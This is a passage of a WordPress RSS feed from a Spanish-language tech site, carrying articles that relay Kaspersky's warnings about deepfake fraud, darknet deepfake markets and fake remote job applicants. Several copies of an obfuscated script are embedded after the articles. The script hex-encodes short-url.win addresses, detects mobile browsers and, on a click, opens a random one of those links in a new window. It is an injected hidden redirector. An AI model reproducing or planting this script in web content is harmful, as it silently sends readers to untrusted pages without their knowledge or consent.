_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/aumento-exponencial-como-la-inteligencia-artificial-impulsa-ataques-de-phishing-y-deepfakes-en-america-latina/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">95922</post-id>	</item>
		<item>
		<title>Deepfakes: El arma de los estafadores en línea</title>
		<link>https://www.todoenunclick.com/deepfakes-el-arma-de-los-estafadores-en-linea/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 18 May 2023 02:02:41 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Chantaje político]]></category>
		<category><![CDATA[Ciberdelincuentes]]></category>
		<category><![CDATA[Darknet]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[Fraudes financieros]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=4399</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Los ciberdelincuentes ofrecen continuamente sus servicios maliciosos en la <em>Darknet</em>, incluida la creación de videos <em>deepfakes, </em>donde el rostro o cuerpo de una persona ha sido alterado digitalmente para que parezca otra. Éstos no sólo representan un riesgo para la reputación y privacidad de los usuarios, sino que también son un peligro para sus finanzas, pues el contenido va desde pornografía, hasta la simulación de <em>cryptostreams</em>, utilizados en criptoestafas. El costo de estos videos varía entre US$300 y US$20,000 por minuto, según la complejidad del proyecto y la calidad del producto final.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En la era digital actual, el riesgo de ser víctima de <em>deepfakes</em> es cada vez mayor, ya que los estafadores pueden extraer fácilmente videos e imágenes de sus objetivos potenciales para manipularlos y utilizarlos para fines maliciosos, como fraudes financieros, chantaje político, venganza o acoso. Sin embargo, la creación de <em>deepfakes</em> de alta calidad requiere conocimientos técnicos y de un <em>software</em> avanzado, por lo que quienes buscan crear contenido multimedia falso recurren a estos servicios en la <em>Darknet</em>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los expertos de Kaspersky <a href="https://www.kaspersky.com/blog/deepfake-darknet-market/48112/">han estudiado</a> constantemente los foros de esta red para conocer mejor su funcionamiento, así como el de la industria de los <em>deepfakes</em>, y descubrieron que existe una demanda tan significativa de este tipo de contenido que incluso supera la oferta disponible. Los usuarios buscan activamente a personas que puedan crear videos falsos para ellos y, en algunos casos, solicitan que sean de objetivos específicos, como celebridades o figuras políticas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Por otro lado, una cifra considerable de publicaciones analizadas estuvo relacionada con criptomonedas. Esto debido a que algunos proveedores ofrecen <em>deepfakes</em> de alta calidad para crear <em>Cryptostreams</em> o sorteos de criptomonedas falsos, los cuales son estafas populares en las que los ciberdelincuentes recaudan criptomonedas mediante la promoción de regalos falsos. Para crear los<em> deepfakes</em>, los estafadores utilizan imágenes de famosos o mezclan videos antiguos para hacer transmisiones en vivo en redes sociales, donde muestran una página prediseñada en la que piden a las víctimas transferir entre 2,500 y 1,000,000 XRP<a href="#_ftn1"><sup>[1]</sup></a>, prometiendo duplicar cualquier pago que se les envíe. Como resultado, las víctimas de estas estafas pueden perder entre US$1,000 y US$460,000.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":4401,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22-2.jpg" alt="Ejemplo de un post en la Darknet que ofrece crear un cryptostream falso." class="wp-image-4401"/></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Además del hecho de que los <em>deepfakes</em> puedan utilizarse para el fraude financiero, también pueden causar un gran problema para la privacidad. Resulta preocupante observar que algunos creadores de <em>deepfakes</em> están ofreciendo sus servicios para crear videos pornográficos falsos, así como tutoriales que incluyen lecciones sobre cómo seleccionar el material de origen e intercambiar rostros para lograr una falsificación convincente. Desafortunadamente, estos videos pueden utilizarse para victimizar y chantajear a personas, causándoles graves daños emocionales e incluso pérdidas económicas.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":4400,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2023/05/Deep-Fake-22-3.jpg" alt="Un ejemplo de un post que ofrece un tutorial sobre la creación de deepkafes." class="wp-image-4400"/></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p><em>“Los ciberdelincuentes utilizan cada vez más los deepfakes para llevar a cabo diversas estafas, como el fraude con criptomonedas, o evadir la seguridad biométrica. El hecho de que exista una gran demanda por estos servicios de creación de deepfakes también indica que los individuos y grupos con intenciones maliciosas están dispuestos a pagar importantes sumas de dinero para adquirir este tipo de vídeos. A medida que la tecnología siga mejorando y haciéndose más accesible, es crucial que las empresas y los particulares tomen medidas para protegerse de las estafas y los ataques relacionados con deepfakes"</em>, comenta<strong> Vladislav Tushkanov, científico jefe de datos en Kaspersky</strong>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La vigilancia continua de la <em>Darknet</em> proporciona información valiosa sobre la industria de los <em>deepfakes</em>, permitiendo a los investigadores descubrir nuevas herramientas, servicios y mercados utilizados para su creación y distribución, además de mejorar su comprensión sobre el panorama de amenazas en evolución. El servicio de <a href="https://tip.kaspersky.com/Help/Doc_data/en-US/DigitalFootprint.htm">Digital Footprint Intelligence</a> de Kaspersky incluye este tipo de supervisión para ayudar a sus clientes a mantenerse a la vanguardia cuando se trata de amenazas relacionadas con <em>deepfakes</em>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En el Día Mundial de Internet que se conmemora el 17 de mayo, Kaspersky ofrece las siguientes recomendaciones para estar protegido de las amenazas relacionadas con los <em>deepfakes:</em></p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>Revisar las prácticas de ciberseguridad implementadas en tu organización</strong>, no sólo en términos de <em>software</em>, sino también en cuanto a habilidades informáticas desarrolladas. Utilizar <a href="https://latam.kaspersky.com/enterprise-security/threat-intelligence">Kaspersky Threat Intelligence</a> para adelantarte al panorama actual de amenazas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Capacitar a los empleados para que entiendan qué son los <em>deepfakes</em></strong>, cómo funcionan y cuáles son los retos que pueden presentar. Asimismo, realizar campañas continuas de concienciación y educación para enseñarles a detectar una <em>deepfake.</em> Con <a href="https://latam.kaspersky.com/small-to-medium-business-security/security-awareness-platform">Kaspersky Automated Security Awareness Platform</a>, los colaboradores son capaces de mantenerse al día de las amenazas más recientes y aumentar los niveles de alfabetización digital.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utilizar fuentes de noticias de buena calidad</strong>. El analfabetismo informativo sigue siendo un factor crucial para la proliferación de <em>deepfakes.</em></li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Tener buenos protocolos como "confiar, pero verificar"</strong>. Una actitud escéptica ante los mensajes de voz y los videos no garantizará que la gente nunca sea engañada, pero puede ayudar a evitar muchas de las trampas más comunes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Conocer las principales características de los videos <em>deepfake</em></strong> <strong>para evitar convertirte en una víctima:</strong> movimientos bruscos, cambios en la iluminación de un fotograma a otro, cambios en el tono de la piel, parpadeo extraño o ausencia total de parpadeo, labios mal sincronizados con el habla, artefactos digitales en la imagen, así como videos intencionalmente codificados en baja calidad y con mala iluminación.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para conocer más acerca de la industria de los <em>deepfakes</em>, visita el <a href="https://latam.kaspersky.com/blog/">blog</a> oficial de Kaspersky.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/deepfakes-el-arma-de-los-estafadores-en-linea/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">97932</post-id>	</item>
		<item>
		<title>Vacantes remotas y los deepfakes: cómo las empresas pueden evitar la contratación de postulantes ultrafalsos</title>
		<link>https://www.todoenunclick.com/vacantes-remotas-y-los-deepfakes-como-las-empresas-pueden-evitar-la-contratacion-de-postulantes-ultrafalsos/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 02 Aug 2022 14:37:03 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[postulantes ultrafalsos]]></category>
		<category><![CDATA[Vacantes remotas]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=94538</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Vacantes remotas y los deepfakes: cómo las empresas pueden evitar la contratación de postulantes ultrafalsos" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Vacantes-remotas-y-los-deepfakes.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>La mayoría de los argentinos desconoce los graves problemas asociados al uso de deepfakes, mucho menos el impacto que pueden tener en el ámbito corporativo.&nbsp;<strong><em>Según una encuesta de Kaspersky, 67% de los argentinos no sabe qué es un deepfake y 3 de cada 5 admite no saber reconocer cuando un video ha sido editado digitalmente usando la técnica.</em></strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Últimamente, los deepfakes han ganado terreno en todo el mundo por su impacto en situaciones que antes se consideraban seguras. Un comunicado reciente de la FBI advierte sobre el&nbsp;aumento en empresas que han reportado el uso de&nbsp;<em>deepfakes</em>&nbsp;por parte de solicitantes de empleo. Los impostores se hacen pasar por otra persona&nbsp;con videos e imágenes alterados de manera convincente para obtener un puesto a distancia. La técnica les permite recrear la apariencia o la voz de otra persona con la ayuda de la inteligencia artificial.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Parece una broma, pero no lo es. Contratar a un deepfake puede generar serios problemas si un empleado falso obtiene acceso a información corporativa confidencial y datos de clientes. Además, puede representar una amenaza para la seguridad de los datos de una empresa y, en caso de una filtración, dificulta que la compañía pueda llevar al estafador ante la justicia. Además, con la tecnología aún poco conocida, para muchos resulta difícil identificar el fraude.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Otra práctica recurrente es cuando los ciberdelincuentes&nbsp;utilizan este nuevo método para burlar&nbsp;los controles biométricos&nbsp;utilizados por los bancos y el mercado de intercambios de criptomonedas&nbsp;para verificar la identidad de los usuarios y prevenir el lavado de dinero o que se abran cuentas bancarias a nombre de terceros. También se han registrado casos de&nbsp;<em>phishing</em>&nbsp;dirigido utilizando deepfakes, al imitar a ejecutivos de empresas para&nbsp;ganarse la confianza de una persona y engañarles para que entreguen datos confidenciales, dinero o acceso a la infraestructura de la organización. En un caso registrado, los delincuentes&nbsp;<a href="https://www.forbes.com/sites/thomasbrewster/2021/10/14/huge-bank-fraud-uses-deep-fake-voice-tech-to-steal-millions/?sh=489a8ba87559" target="_blank" rel="noreferrer noopener">lograron obtener 35 millones de dólares</a>&nbsp;falsificando la voz del director de una compañía.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Ser consciente del problema es la mitad de la batalla. Afortunadamente, las empresas de ciberseguridad constantemente desarrollan y afinan sus algoritmos de detección para luchar contra las nuevas amenazas. Si bien algunos ultrafalsos pueden ser difíciles de identificar por ser de alta calidad, la buena noticia es que muchos de los deepfakes utilizados para estafas o la interacción síncrona pueden detectarse”,</em>&nbsp;comenta&nbsp;<strong>Fabio Assolini, director del Equipo de Investigación y Análisis para América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Kaspersky recomienda las siguientes medidas para minimizar la probabilidad de éxito de ataques a través de deepfakes:</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sospeche de videos que incluyan&nbsp;movimientos antinaturales de labios, cabello mal arreglado, formas faciales que no coinciden, poco o ningún parpadeo, diferencias en el color de la piel, errores en la representación de la ropa o una mano que pasa sobre la cara.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Para minimizar la posibilidad de contratar a un empleado falso, divida las entrevistas de trabajo en varias etapas que involucren no solo a los gerentes de recursos humanos, sino también a las personas que trabajarán con un nuevo empleado. Esto aumentará las posibilidades de detectar algo inusual.</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><li>Asegúrese de que sus empleados sepan qué es y cómo funciona la tecnología deepfake y los desafíos que esta plantea.</li></ul>
<!-- /wp:list -->

<!-- wp:list -->
<ul><li>Utilice una&nbsp;<a href="https://latam.kaspersky.com/small-to-medium-business-security/cloud" target="_blank" rel="noreferrer noopener">solución de ciberseguridad confiable</a>&nbsp;que le ofrezca asistencia si un deepfake de alta calidad convence a un empleado a que descargue archivos o programas maliciosos, o visite enlaces sospechosos o sitios web de&nbsp;<em>phishing</em>. Además,&nbsp;<a href="https://kfp.kaspersky.com/es/" target="_blank" rel="noreferrer noopener">tecnologías antifraude</a>&nbsp;que proporcione análisis del comportamiento del usuario y monitoreo de transacciones financieras brindan una capa adicional de protección.</li></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para más información sobre ciberseguridad, visite nuestro&nbsp;<a href="http://latam.kaspersky.com/blog" target="_blank" rel="noreferrer noopener">blog.</a></p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return 